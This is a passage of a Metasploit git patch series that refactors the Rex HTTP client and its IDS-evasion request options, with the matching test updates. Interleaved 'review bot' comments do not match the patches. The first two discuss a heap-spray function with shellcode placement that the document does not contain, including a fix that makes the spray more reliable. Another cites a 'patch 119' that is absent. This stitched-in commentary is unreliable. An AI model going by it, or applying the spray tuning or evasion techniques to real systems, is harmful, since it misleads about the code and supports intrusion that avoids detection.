-0600 Subject: [PATCH 105/139] More accurate docs --- lib/rex/proto/http/client.rb | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index f3073ca530..5402b3ba3e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb 
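Review bot: The new header comment documents each argument but not what the defaults cost: `maxAllocs` 0x250 allocations of `heapBlockSize` 0x40000 bytes is roughly 148 MiB of string data per spray, which matters when a module targets clients with little memory. A line such as `# Memory committed is about maxAllocs * heapBlockSize bytes (~148 MiB with the defaults); lower maxAllocs for constrained targets.` under the argument list would let authors size the spray deliberately. In this view the `objId` entry reads "The ID for a … HTML tag" with the element name missing (presumably a div, given `div_container`) and "Example of using the 'sprayHeap' function:" is followed only by bare comment markers; if that is how the source reads rather than an artefact of markup stripping, the tag name and the example body need filling in.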
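Review bot: The new guard `if (offset > 0x800) { throw "Bad alignment"; }` checks the offset but not the shellcode length, while the block layout two lines later, `data = junk.substring(0,offset) + shellcode; data += junk.substring(0,0x800-offset-shellcode.length);`, assumes the two together fit in 0x800 characters. When `offset + shellcode.length` exceeds that, the second `substring` receives a negative end, returns "", and `data` ends up longer than 0x800, so the shellcode no longer sits at a fixed offset inside the repeated block and the spray degrades with no error at all. Tightening the check to `if (offset + shellcode.length > 0x800) { throw "Bad alignment: offset + shellcode exceeds 0x800 characters"; }` reports the misuse up front. The function begins and ends outside this hunk.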
@@ -254,6 +254,7 @@ class Client # If the request is a 401, and we have creds, it will attempt to complete # authentication and return the final response # + # @return (see #_send_recv) def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] @@ -271,7 +272,7 @@ class Client # Call this directly instead of {#send_recv} if you don't want automatic # authentication handling. # - # @return [Response] + # @return (see #read_response) def _send_recv(req, t = -1, persist=false) @pipeline = persist send_request(req, t) @@ -286,6 +287,7 @@ class Client # @param req [Request,ClientRequest,#to_s] The request to send # @param t (see #connect) # + # @return [void] def send_request(req, t = -1) connect(t) conn.put(req.to_s) @@ -299,6 +301,7 @@ class Client # @param opts [Hash] the options used to generate the original HTTP request # @param t [Fixnum] the timeout for the request in seconds # @param persist [Boolean] whether or not to persist the TCP connection (pipelining) + # # @return [Response] the last valid HTTP response object we received def send_auth(res, opts, t, persist) if opts['username'].nil? or opts['username'] == '' @@ -352,15 +355,19 @@ class Client return res end - # Converts username and password into the HTTP Basic - # authorization string. + # Converts username and password into the HTTP Basic authorization + # string. + # + # @return [String] A value suitable for use as an Authorization header def basic_auth_header(username,password) auth_str = username.to_s + ":" + password.to_s auth_str = "Basic " + Rex::Text.encode_base64(auth_str) end # Send a series of requests to complete Digest Authentication + # # @param opts [Hash] the options used to build an HTTP request + # # @return [Response] the last valid HTTP response we received def digest_auth(opts={}) @nonce_count = 0 
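Review bot: The new YARD block for `basic_auth_header` gives a `@return` but no `@param` tags, unlike the neighbouring `send_auth` and `digest_auth` docs; add `# @param username [String] sent in clear inside the base64 value` and `# @param password [String] likewise only base64-encoded, not protected`, which also records that Basic auth gives no confidentiality off an SSL connection. The body's second line, `auth_str = "Basic " + Rex::Text.encode_base64(auth_str)`, assigns to a local that is never read again and only returns because it happens to be the last expression; `"Basic " + Rex::Text.encode_base64(auth_str)` says the same without the dead assignment. The `Client` class opens well before this hunk.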
@@ -495,14 +502,14 @@ class Client end end - # - # Opts - - # Inherits all the same options as send_request_cgi - # provider - What Negotiate Provider to use (supports NTLM and Negotiate) # # Builds a series of requests to complete Negotiate Auth. Works essentially # the same way as Digest auth. Same pipelining concerns exist. # + # @option opts (see #send_request_cgi) + # @option opts provider ["Negotiate","NTLM"] What Negotiate provider to use + # + # @return [Response] the last valid HTTP response we received def negotiate_auth(opts={}) ntlm_options = { :signing => false, @@ -608,6 +615,7 @@ class Client # # Read a response from the server # + # @return [Response] def read_response(t = -1, opts = {}) resp = Response.new From 5606db3f9ca93da80aebe24c0a5139f32c9cb951 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 16:28:17 -0600 Subject: [PATCH 106/139] Re-enable some commented tests --- spec/lib/rex/proto/http/client_spec.rb | 29 +++++++++++++++----------- 1 file changed, 17 insertions(+), 12 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index d216c75325..8dc10b8c46 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -43,8 +43,8 @@ describe Rex::Proto::Http::Client do cli.instance_variable_get(:@context).should == {} cli.instance_variable_get(:@ssl).should be_false cli.instance_variable_get(:@proxies).should be_nil - # cli.instance_variable_get(:@username).should be_empty - # cli.instance_variable_get(:@password).should be_empty + cli.instance_variable_get(:@username).should be_empty + cli.instance_variable_get(:@password).should be_empty cli.config.should be_a_kind_of Hash end 
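Review bot: The rewritten header for `negotiate_auth` uses `@option opts (see #send_request_cgi)` and `@option opts provider ["Negotiate","NTLM"]`, neither of which is valid YARD: `@option` expects `@option opts [Type] :key description`, and `(see …)` is only understood on `@return`, `@param` and `@raise`. As written the generated docs will show the literal text or a parse warning rather than a typed option. `# @option opts [String] 'provider' which negotiate provider to use, "NTLM" or "Negotiate"` plus a plain sentence `# Accepts the same options as {#send_request_cgi}.` conveys the intent in a form YARD renders. The method body runs past the end of the hunk.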
@@ -53,7 +53,11 @@ describe Rex::Proto::Http::Client do end it "should produce a CGI HTTP request" do - cli.request_cgi.should be_a_kind_of Rex::Proto::Http::ClientRequest + req = cli.request_cgi + req.should be_a_kind_of Rex::Proto::Http::ClientRequest + + req.port.should == 80 + req.ssl.should be_false end it "should attempt to connect to a server" do @@ -78,15 +82,16 @@ describe Rex::Proto::Http::Client do end it "should test for credentials" do - # cli.should_not have_creds - # this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) - # this_cli.should have_creds - pending "Should actually respond to :has_creds" + pending "Should actually respond to :has_creds" do + cli.should_not have_creds + this_cli = described_class.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) + this_cli.should have_creds + end end it "should send authentication", :pending => excuse_needs_connection - it "should produce a basic authentication header", :pending => "Waiting for #1500" do + it "should produce a basic authentication header" do u = "user1" p = "pass1" b64 = ["#{u}:#{p}"].pack("m*").strip @@ -114,10 +119,10 @@ describe Rex::Proto::Http::Client do end it "should tell if pipelining is enabled" do - cli.pipelining?.should be_false + cli.should_not be_pipelining this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) this_cli.pipeline = true - this_cli.pipelining?.should be_true + this_cli.should be_pipelining end it "should respond to its various accessors" do @@ -129,8 +134,8 @@ describe Rex::Proto::Http::Client do cli.should respond_to :conn cli.should respond_to :context cli.should respond_to :proxies - # cli.should respond_to :username - # cli.should respond_to :password + cli.should respond_to :username + cli.should respond_to :password cli.should respond_to :junk_pipeline # These are supposed to be protected cli.should respond_to :ssl From 4edd46216f32d4c0009aadf8204b8bb4fcc8af89 Mon Sep 17 00:00:00 2001 
From: James Lee Date: Wed, 27 Feb 2013 17:29:26 -0600 Subject: [PATCH 107/139] Refactor config -> opts Puts all the evasion stuff in the same place as regular HTTP options to make it easier to deal with. --- lib/rex/proto/http/client.rb | 3 - lib/rex/proto/http/client_request.rb | 201 ++++++++---------- .../lib/rex/proto/http/client_request_spec.rb | 32 ++- spec/lib/rex/proto/http/client_spec.rb | 2 - 4 files changed, 103 insertions(+), 135 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 5402b3ba3e..b10af20c3c 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -23,7 +23,6 @@ module Http ### class Client - DefaultUserAgent = Rex::Proto::Http::ClientRequest::DefaultUserAgent # # Creates a new client instance @@ -41,8 +40,6 @@ class Client self.config = { 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, - 'version' => '1.1', - 'agent' => DefaultUserAgent, }.merge(Http::ClientRequest::DefaultConfig) self.config_types = { diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 1b55784e99..31933fe5f7 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -14,6 +14,25 @@ class ClientRequest DefaultUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" DefaultConfig = { + # + # Regular HTTP stuff + # + 'agent' => DefaultUserAgent, + 'cgi' => true, + 'cookie' => nil, + 'data' => '', + 'headers' => {}, + 'raw_headers' => '', + 'method' => 'GET', + 'path_info' => '', + 'port' => 80, + 'proto' => 'HTTP', + 'ssl' => false, + 'uri' => '/', + 'vars_get' => {}, + 'vars_post' => {}, + 'version' => '1.1', + # # Evasion options # @@ -45,6 +64,7 @@ class ClientRequest 'uri_fake_params_start' => false, # bool 'header_folding' => false, # bool 'chunked_size' => 0, # integer + # # NTLM Options # 
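Review bot: Deleting `DefaultUserAgent = Rex::Proto::Http::ClientRequest::DefaultUserAgent` removes a public constant from `Rex::Proto::Http::Client`, and any module or library code still referencing `Client::DefaultUserAgent` will raise `NameError` at the call site; the previous commit had just turned it into an alias, which suggests outside readers were expected. Unless a search of the tree shows no remaining users, keep the one-line alias, with `# kept for callers that predate ClientRequest; prefer ClientRequest::DefaultUserAgent` above it. The class continues outside the hunk.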
@@ -61,68 +81,25 @@ class ClientRequest 'DigestAuthIIS' => true } - attr_accessor :authorization - attr_accessor :cgi - attr_accessor :config - attr_accessor :connection - attr_accessor :content_type - attr_accessor :cookie - attr_accessor :data - attr_accessor :headers - attr_accessor :host - attr_accessor :method - attr_accessor :path - attr_accessor :port - attr_accessor :protocol - attr_accessor :query - attr_accessor :raw_headers - attr_accessor :ssl - attr_accessor :uri - attr_accessor :user_agent - attr_accessor :vars_get - attr_accessor :vars_post - attr_accessor :version - attr_reader :opts def initialize(opts={}) - @cgi = (opts['cgi'].nil? ? true : opts['cgi']) - @config = DefaultConfig.merge(opts['client_config'] || {}) - @connection = opts['connection'] - @content_type = opts['ctype'] - @cookie = opts['cookie'] - @data = opts['data'] || "" - @headers = opts['headers'] || {} - @host = opts['vhost'] - @method = opts['method'] || "GET" - @path = opts['path_info'] - @port = opts['port'] || 80 - @protocol = opts['proto'] || "HTTP" - @query = opts['query'] || "" - @ssl = opts['ssl'] - @raw_headers = opts['raw_headers'] || "" - @uri = opts['uri'] - @user_agent = opts['agent'] - @vars_get = opts['vars_get'] || {} - @vars_post = opts['vars_post'] || {} - @version = opts['version'] || "1.1" - @opts = opts - + @opts = DefaultConfig.merge(opts) end def to_s # Start GET query string - qstr = query.dup + qstr = opts['query'] ? opts['query'].dup : "" # Start POST data string - pstr = data.dup + pstr = opts['data'] ? opts['data'].dup : "" - if cgi + if opts['cgi'] uri_str= set_cgi - if (config['pad_get_params']) - 1.upto(config['pad_get_params_count'].to_i) do |i| + if (opts['pad_get_params']) + 1.upto(opts['pad_get_params_count'].to_i) do |i| qstr << '&' if qstr.length > 0 qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) qstr << '=' 
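Review bot: `@opts = DefaultConfig.merge(opts)` in the new `initialize` gives every request the very same `headers`, `vars_get` and `vars_post` Hash objects stored in `DefaultConfig`, because `Hash#merge` copies keys but not values, whereas the removed `@headers = opts['headers'] || {}` built a fresh hash per request. Nothing in this hunk mutates them, but any later `opts['headers']['Cookie'] = ...` on one request would silently change the class-wide default and carry that header into every request built afterwards, including requests to other hosts. Dup the mutable defaults after merging, e.g. `%w[headers vars_get vars_post].each { |k| @opts[k] = @opts[k].dup if @opts[k] }`. The same aliasing appears in the client.rb hunk of patch 119 below (`@@ -38,11 +38,13 @@`), where `Client#config` is built from `DefaultConfig.merge({...})`. `to_s` continues past the end of this hunk.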
@@ -130,33 +107,33 @@ class ClientRequest end end - vars_get.each_pair do |var,val| + opts['vars_get'].each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (config['encode_params'] ? set_encode_uri(var) : var) + qstr << (opts['encode_params'] ? set_encode_uri(var) : var) qstr << '=' - qstr << (config['encode_params'] ? set_encode_uri(val) : val) + qstr << (opts['encode_params'] ? set_encode_uri(val) : val) end - if (config['pad_post_params']) - 1.upto(config['pad_post_params_count'].to_i) do |i| + if (opts['pad_post_params']) + 1.upto(opts['pad_post_params_count'].to_i) do |i| rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) pstr << '&' if pstr.length > 0 - pstr << (config['encode_params'] ? set_encode_uri(rand_var) : rand_var) + pstr << (opts['encode_params'] ? set_encode_uri(rand_var) : rand_var) pstr << '=' - pstr << (config['encode_params'] ? set_encode_uri(rand_val) : rand_val) + pstr << (opts['encode_params'] ? set_encode_uri(rand_val) : rand_val) end end - vars_post.each_pair do |var,val| + opts['vars_post'].each_pair do |var,val| pstr << '&' if pstr.length > 0 - pstr << (config['encode_params'] ? set_encode_uri(var) : var) + pstr << (opts['encode_params'] ? set_encode_uri(var) : var) pstr << '=' - pstr << (config['encode_params'] ? set_encode_uri(val) : val) + pstr << (opts['encode_params'] ? set_encode_uri(val) : val) end else uri_str = set_uri - if config['encode'] + if opts['encode'] qstr = set_encode_uri(qstr) end end @@ -166,7 +143,7 @@ class ClientRequest req << set_method_uri_spacer() req << set_uri_prepend() - if config['encode'] + if opts['encode'] req << set_encode_uri(uri_str) else req << uri_str 
@@ -185,7 +162,7 @@ class ClientRequest req << set_host_header # If an explicit User-Agent header is set, then use that instead of the value of user_agent - unless headers.keys.map{|x| x.downcase }.include?('user-agent') + unless opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') req << set_agent_header end @@ -197,19 +174,19 @@ class ClientRequest req << set_content_type_header req << set_content_len_header(pstr.length) req << set_chunked_header() - req << raw_headers + req << opts['raw_headers'] req << set_body(pstr) end protected def set_uri - uri_str = uri.dup - if (config['uri_dir_self_reference']) + uri_str = opts['uri'].dup + if (opts['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end - if (config['uri_dir_fake_relative']) + if (opts['uri_dir_fake_relative']) buf = "" uri_str.split('/').each do |part| cnt = rand(8)+2 @@ -222,10 +199,10 @@ class ClientRequest uri_str = buf end - if (config['uri_full_url']) - url = self.ssl ? "https://" : "http://" - url << self.config['vhost'] - url << ((self.port == 80) ? "" : ":#{self.port}") + if (opts['uri_full_url']) + url = opts['ssl'] ? "https://" : "http://" + url << opts['vhost'] + url << ((opts['port'] == 80) ? "" : ":#{opts['port']}") url << uri_str url else @@ -234,12 +211,12 @@ class ClientRequest end def set_cgi - uri_str = uri.dup - if (config['uri_dir_self_reference']) + uri_str = opts['uri'].dup + if (opts['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end - if (config['uri_dir_fake_relative']) + if (opts['uri_dir_fake_relative']) buf = "" uri_str.split('/').each do |part| cnt = rand(8)+2 @@ -254,10 +231,10 @@ class ClientRequest url = uri_str - if (config['uri_full_url']) - url = self.ssl ? "https" : "http" - url << self.config['vhost'] - url << (self.port == 80) ? "" : ":#{self.port}" + if (opts['uri_full_url']) + url = opts['ssl'] ? "https" : "http" + url << opts['vhost'] + url << (opts['port'] == 80) ? "" : ":#{opts['port']}" url << uri_str end 
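Review bot: In the `uri_full_url` branch of `set_uri`, `url << opts['vhost']` raises `TypeError` when no `'vhost'` was passed, since `DefaultConfig` as extended in this commit has no `vhost` key and `String#<<` does not accept nil. Either fail with a clear message, `raise ArgumentError, "uri_full_url requires a 'vhost'" unless opts['vhost']`, or fall back to `opts['vhost'].to_s` and let the caller decide. The same pattern is in `set_cgi` in this hunk, which additionally has `url << (opts['port'] == 80) ? "" : ":#{opts['port']}"` binding as `(url << cond) ? ... : ...`; I see a later patch on this page removes `set_cgi`, so only `set_uri` still needs the guard.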
@@ -266,24 +243,24 @@ class ClientRequest def set_encode_uri(str) a = str.dup - config['uri_encode_count'].times { - a = Rex::Text.uri_encode(a, config['uri_encode_mode']) + opts['uri_encode_count'].times { + a = Rex::Text.uri_encode(a, opts['uri_encode_mode']) } return a end def set_method - ret = method.dup + ret = opts['method'].dup - if (config['method_random_valid']) + if (opts['method_random_valid']) ret = ['GET', 'POST', 'HEAD'][rand(3)] end - if (config['method_random_invalid']) + if (opts['method_random_invalid']) ret = Rex::Text.rand_text_alpha(rand(20)+1) end - if (config['method_random_case']) + if (opts['method_random_case']) ret = Rex::Text.to_rand_case(ret) end @@ -291,11 +268,11 @@ class ClientRequest end def set_method_uri_spacer - len = config['pad_method_uri_count'].to_i + len = opts['pad_method_uri_count'].to_i set = " " buf = "" - case config['pad_method_uri_type'] + case opts['pad_method_uri_type'] when 'tab' set = "\t" when 'apache' @@ -315,11 +292,11 @@ class ClientRequest def set_uri_prepend prefix = "" - if (config['uri_fake_params_start']) + if (opts['uri_fake_params_start']) prefix << '/%3fa=b/../' end - if (config['uri_fake_end']) + if (opts['uri_fake_end']) prefix << '/%20HTTP/1.0/../../' end @@ -331,7 +308,7 @@ class ClientRequest # TODO: # * Encode path information def set_path_info - path ? path : '' + opts['path_info'] ? opts['path_info'] : '' end # @@ -347,11 +324,11 @@ class ClientRequest # Return the spacing between the uri and the version # def set_uri_version_spacer - len = config['pad_uri_version_count'].to_i + len = opts['pad_uri_version_count'].to_i set = " " buf = "" - case config['pad_uri_version_type'] + case opts['pad_uri_version_type'] when 'tab' set = "\t" when 'apache' 
@@ -369,17 +346,17 @@ class ClientRequest # Return the HTTP version string # def set_version - ret = protocol + "/" + version + ret = opts['proto'] + "/" + opts['version'] - if (config['version_random_valid']) - ret = protocol + "/" + ['1.0', '1.1'][rand(2)] + if (opts['version_random_valid']) + ret = opts['proto'] + "/" + ['1.0', '1.1'][rand(2)] end - if (config['version_random_invalid']) + if (opts['version_random_invalid']) ret = Rex::Text.rand_text_alphanumeric(rand(20)+1) end - if (config['version_random_case']) + if (opts['version_random_case']) ret = Rex::Text.to_rand_case(ret) end @@ -390,7 +367,7 @@ class ClientRequest # Return a formatted header string # def set_formatted_header(var, val) - if (self.config['header_folding']) + if (self.opts['header_folding']) "#{var}:\r\n\t#{val}\r\n" else "#{var}: #{val}\r\n" 
@@ -401,38 +378,38 @@ class ClientRequest # Return the HTTP agent header # def set_agent_header - user_agent ? set_formatted_header("User-Agent", user_agent) : "" + opts['agent'] ? set_formatted_header("User-Agent", opts['agent']) : "" end def set_auth_header - authorization ? set_formatted_header("Authorization", authorization) : "" + opts['authorization'] ? set_formatted_header("Authorization", opts['authorization']) : "" end # # Return the HTTP cookie header # def set_cookie_header - cookie ? set_formatted_header("Cookie", cookie) : "" + opts['cookie'] ? set_formatted_header("Cookie", opts['cookie']) : "" end # # Return the HTTP connection header # def set_connection_header - connection ? set_formatted_header("Connection", connection) : "" + opts['connection'] ? set_formatted_header("Connection", opts['connection']) : "" end # # Return the content type header # def set_content_type_header - set_formatted_header("Content-Type", content_type) + opts['ctype'] ? set_formatted_header("Content-Type", opts['ctype']) : "" end # # Return the content length header def set_content_len_header(clen) - return "" if config['chunked_size'] > 0 + return "" if opts['chunked_size'] > 0 set_formatted_header("Content-Length", clen) end @@ -440,8 +417,8 @@ class ClientRequest # Return the HTTP Host header # def set_host_header - return "" if config['uri_full_url'] - host ||= config['vhost'] + return "" if opts['uri_full_url'] + host ||= opts['vhost'] # IPv6 addresses must be placed in brackets if Rex::Socket.is_ipv6?(host) @@ -449,8 +426,8 @@ class ClientRequest end # The port should be appended if non-standard - if not [80,443].include?(port) - host = host + ":#{port}" + if not [80,443].include?(opts['port']) + host = host + ":#{opts['port']}" end set_formatted_header("Host", host) 
@@ -462,8 +439,8 @@ class ClientRequest def set_extra_headers buf = '' - if (config['pad_fake_headers']) - 1.upto(config['pad_fake_headers_count'].to_i) do |i| + if (opts['pad_fake_headers']) + 1.upto(opts['pad_fake_headers_count'].to_i) do |i| buf << set_formatted_header( Rex::Text.rand_text_alphanumeric(rand(32)+1), Rex::Text.rand_text_alphanumeric(rand(32)+1) @@ -471,7 +448,7 @@ class ClientRequest end end - headers.each_pair do |var,val| + opts['headers'].each_pair do |var,val| buf << set_formatted_header(var, val) end @@ -479,7 +456,7 @@ class ClientRequest end def set_chunked_header - return "" if config['chunked_size'] == 0 + return "" if opts['chunked_size'] == 0 set_formatted_header('Transfer-Encoding', 'chunked') end @@ -487,11 +464,11 @@ class ClientRequest # Return the HTTP seperator and body string # def set_body(bdata) - return "\r\n" + bdata if config['chunked_size'] == 0 + return "\r\n" + bdata if opts['chunked_size'] == 0 str = bdata.dup chunked = '' while str.size > 0 - chunk = str.slice!(0,rand(config['chunked_size']) + 1) + chunk = str.slice!(0,rand(opts['chunked_size']) + 1) chunked << sprintf("%x", chunk.size) + "\r\n" + chunk + "\r\n" end "\r\n" + chunked + "0\r\n\r\n" diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 154a1a9485..29db9873bf 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -4,7 +4,7 @@ require 'rex/proto/http/client_request' shared_context "with 'uri_dir_self_reference'" do before(:all) do - client_request.config['uri_dir_self_reference'] = true + client_request.opts['uri_dir_self_reference'] = true end it "should return the unmodified uri" do 
@@ -14,9 +14,9 @@ end shared_context "with no evasions" do before(:all) do - client_request.config['uri_dir_self_reference'] = false - client_request.config['uri_fake_params_start'] = false - client_request.config['uri_full_url'] = false + client_request.opts['uri_dir_self_reference'] = false + client_request.opts['uri_fake_params_start'] = false + client_request.opts['uri_full_url'] = false end it "should return the unmodified uri" do @@ -27,11 +27,11 @@ end shared_context "with 'uri_full_url'" do before(:all) do - client_request.config['uri_full_url'] = true + client_request.opts['uri_full_url'] = true end before(:each) do - client_request.config['vhost'] = host + client_request.opts['vhost'] = host end context "with ipv4 host" do @@ -43,7 +43,7 @@ shared_context "with 'uri_full_url'" do context "with ipv6 host" do let(:host) { '2001:DB8::1' } #before(:each) do - # client_request.config['vhost'] = "[#{host}]" + # client_request.opts['vhost'] = "[#{host}]" #end it_behaves_like "uri_full_url" @@ -83,9 +83,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with reasonable default options", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", - # Yes, vhost is in the config. There is no godly reason why this - # should be so. - 'client_config' => { 'vhost' => 'www.example.com', }, + 'vhost' => 'www.example.com', }), { :set_cgi => { :result => "/" }, @@ -106,7 +104,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with header folding", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", - 'client_config' => { 'header_folding' => true, } + 'header_folding' => true, }), { :set_uri => { :result => "/" }, @@ -124,7 +122,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with ipv6 host", default_options.merge({ - 'client_config' => { 'vhost' => "2001:DB8::1" }, + 'vhost' => "2001:DB8::1", }), { :set_host_header => { :result => "Host: [2001:DB8::1]\r\n" }, 
@@ -134,7 +132,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with ipv6 host and non-default port", default_options.merge({ 'port' => 1234, - 'client_config' => { 'vhost' => "2001:DB8::1" }, + 'vhost' => "2001:DB8::1", }), { :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, @@ -162,11 +160,9 @@ describe Rex::Proto::Http::ClientRequest do context "with GET paramaters" do subject(:client_request) { options_with_params = default_options.merge({ - 'client_config' => { - 'uri_encode_mode' => encode_mode, - 'encode_params' => encode_params, - 'encode' => false, - }, + 'uri_encode_mode' => encode_mode, + 'encode_params' => encode_params, + 'encode' => false, 'vars_get' => vars_get, }) Rex::Proto::Http::ClientRequest.new(options_with_params) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 8dc10b8c46..11177b90fe 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -56,8 +56,6 @@ describe Rex::Proto::Http::Client do req = cli.request_cgi req.should be_a_kind_of Rex::Proto::Http::ClientRequest - req.port.should == 80 - req.ssl.should be_false end it "should attempt to connect to a server" do From b0745b090ac4698d54097f383f5ea7486c6f2ba8 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 17:54:31 -0600 Subject: [PATCH 108/139] Msf HTTP uses this directly, can't axe it --- lib/rex/proto/http/client.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index b10af20c3c..be7b6cb436 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -23,6 +23,7 @@ module Http ### class Client + DefaultUserAgent = ClientRequest::DefaultUserAgent # # Creates a new client instance From 16bba7a6aca24d1dd28cddab66595d81d753f98d Mon Sep 17 00:00:00 2001 
From: James Lee Date: Wed, 27 Feb 2013 18:06:55 -0600 Subject: [PATCH 109/139] Add test for pad_get_params --- .../lib/rex/proto/http/client_request_spec.rb | 20 +++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 29db9873bf..26729dfa52 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -178,6 +178,22 @@ describe Rex::Proto::Http::ClientRequest do } end + context "with 'pad_get_params'" do + let(:encode_params) { true } + it "should ..." do + old = client_request.opts['pad_get_params'] + client_request.opts['pad_get_params'] = true + + client_request.opts['pad_get_params_count'] = 0 + client_request.to_s.split("&").length.should == vars_get.length + + client_request.opts['pad_get_params_count'] = 10 + client_request.to_s.split("&").length.should == vars_get.length + 10 + + client_request.opts['pad_get_params'] = old + end + end + context "without 'encode_params'" do let(:encode_params) { false } it "should contain the unaltered params" do @@ -190,7 +206,7 @@ describe Rex::Proto::Http::ClientRequest do context "with 'encode_params'" do let(:encode_params) { true } - context "with 'uri_encode_mode' = default (hex-normal)" do + context "and 'uri_encode_mode' = default (hex-normal)" do it "should encode special chars" do str = client_request.to_s str.should include("foo%5b%5d=bar") @@ -199,7 +215,7 @@ describe Rex::Proto::Http::ClientRequest do end end - context "with 'uri_encode_mode' = hex-all" do + context "and 'uri_encode_mode' = hex-all" do let(:encode_mode) { 'hex-all' } it "should encode all chars" do str = client_request.to_s From 425c245771f68e69b5b90ac5e6b984d10f9bfc58 Mon Sep 17 00:00:00 2001 
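Review bot: The new `it "should ..." do` example only restores `opts['pad_get_params']` on the success path, so a failing expectation leaves padding enabled for every later example that shares this `client_request`, and `opts['pad_get_params_count']` is never restored at all (it stays at 10). Move the cleanup into an `after` hook or an `ensure` block so both keys are reset regardless of outcome, and give the example a real description, e.g. `it "should add 'pad_get_params_count' random params to the query string" do`.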
From: James Lee Date: Wed, 27 Feb 2013 19:13:05 -0600 Subject: [PATCH 110/139] Axe set_cgi in favor of set_uri They were identical except for a couple of extra bugs in set_cgi. Also changes ```split("/")``` to ```split("/", -1)```, which behaves correctly when the input has a seperator at the beginning or end. --- lib/rex/proto/http/client_request.rb | 38 ++---------------- .../lib/rex/proto/http/client_request_spec.rb | 40 ++++++++++++------- 2 files changed, 30 insertions(+), 48 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 31933fe5f7..62e1ede0e8 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -32,6 +32,7 @@ class ClientRequest 'vars_get' => {}, 'vars_post' => {}, 'version' => '1.1', + 'vhost' => nil, # # Evasion options @@ -96,7 +97,7 @@ class ClientRequest pstr = opts['data'] ? opts['data'].dup : "" if opts['cgi'] - uri_str= set_cgi + uri_str = set_uri if (opts['pad_get_params']) 1.upto(opts['pad_get_params_count'].to_i) do |i| @@ -132,10 +133,10 @@ class ClientRequest pstr << (opts['encode_params'] ? set_encode_uri(val) : val) end else - uri_str = set_uri if opts['encode'] qstr = set_encode_uri(qstr) end + uri_str = set_uri end req = '' @@ -188,7 +189,7 @@ class ClientRequest if (opts['uri_dir_fake_relative']) buf = "" - uri_str.split('/').each do |part| + uri_str.split('/',-1).each do |part| cnt = rand(8)+2 1.upto(cnt) { |idx| buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) 
@@ -210,37 +211,6 @@ class ClientRequest end end - def set_cgi - uri_str = opts['uri'].dup - if (opts['uri_dir_self_reference']) - uri_str.gsub!('/', '/./') - end - - if (opts['uri_dir_fake_relative']) - buf = "" - uri_str.split('/').each do |part| - cnt = rand(8)+2 - 1.upto(cnt) { |idx| - buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) - } - buf << ("/.." * cnt) - buf << "/" + part - end - uri_str = buf - end - - url = uri_str - - if (opts['uri_full_url']) - url = opts['ssl'] ? "https" : "http" - url << opts['vhost'] - url << (opts['port'] == 80) ? "" : ":#{opts['port']}" - url << uri_str - end - - url - end - def set_encode_uri(str) a = str.dup opts['uri_encode_count'].times { diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 26729dfa52..426721cb6c 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -2,15 +2,6 @@ require 'spec_helper' require 'rex/proto/http/client_request' -shared_context "with 'uri_dir_self_reference'" do - before(:all) do - client_request.opts['uri_dir_self_reference'] = true - end - - it "should return the unmodified uri" do - client_request.send(:set_uri).should == "/./" - end -end shared_context "with no evasions" do before(:all) do @@ -24,6 